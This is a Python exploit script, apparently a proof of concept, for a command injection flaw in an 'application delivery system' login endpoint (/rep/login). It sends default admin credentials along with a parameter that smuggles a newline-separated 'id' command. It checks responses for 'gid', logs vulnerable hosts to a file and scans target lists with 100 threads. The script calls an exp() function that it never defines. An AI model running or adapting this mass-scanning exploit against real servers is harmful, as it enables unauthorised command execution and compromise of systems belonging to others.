import requests,sys,argparse,re,time,os
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()
def banner():
    test = """


██████╗ ███████╗██╗     ██╗██╗   ██╗███████╗██████╗ ██╗   ██╗     ███████╗██╗   ██╗███████╗████████╗███████╗███╗   ███╗
██╔══██╗██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗╚██╗ ██╔╝     ██╔════╝╚██╗ ██╔╝██╔════╝╚══██╔══╝██╔════╝████╗ ████║
██║  ██║█████╗  ██║     ██║██║   ██║█████╗  ██████╔╝ ╚████╔╝█████╗███████╗ ╚████╔╝ ███████╗   ██║   █████╗  ██╔████╔██║
██║  ██║██╔══╝  ██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗  ╚██╔╝ ╚════╝╚════██║  ╚██╔╝  ╚════██║   ██║   ██╔══╝  ██║╚██╔╝██║
██████╔╝███████╗███████╗██║ ╚████╔╝ ███████╗██║  ██║   ██║        ███████║   ██║   ███████║   ██║   ███████╗██║ ╚═╝ ██║
╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝   ╚═╝        ╚══════╝   ╚═╝   ╚══════╝   ╚═╝   ╚══════╝╚═╝     ╚═╝
                                                                                                                       
                                                               author:zm
"""
    print(test)

def main():
    banner()
    parser = argparse.ArgumentParser(description="Deeply convinced of the command execution vulnerability in the application delivery system")
    parser.add_argument('-u','--url',dest='url',type=str,help='input your url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input your file')
    args = parser.parse_args()
    if args.url and not args.file:
        if poc(args.url):
            exp(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")
def poc(target):
    payload = '/rep/login'
    headers = {
        'user-agent':'mozilla/5.0 (windows Nt 10.0; win64; x64; rv:128.0) gecko/20100101 firefox/128.0',
        'accept':'*/*',
        'accept-language':'ZH-cn,zh;q=0.8,ZH-tw;q=0.7,ZH-hk;q=0.5,EN-us;q=0.3,en;q=0.2',
        'accept-encoding':'gzip, deflate, br',
        'content-type':'application/x-www-form-urlencoded; charsET=utF-8',
        'x-requested-with':'XmlhTtprequest',
        'content-length':'96',
        'connection':'close',
    }
    data = 'userID=admin&userPsw=admin&page=login&log_type=report&index=index&clsMode=cls_mode_login%0Aid%0A'
    try:
        res1 = requests.post(url=target+payload,headers=headers,data=data,verify=False,timeout=5)
        if 'gid' in res1.text:
            print(f"[+] {target} 存在漏洞 “{target+payload}”")
            with open('result4.txt', 'a', encoding='utf-8') as f:
                f.write(target + '\n')
        else:
            print(f"[-] {target} 没有漏洞")
    except:
        pass
if __name__ == '__main__':
    main()
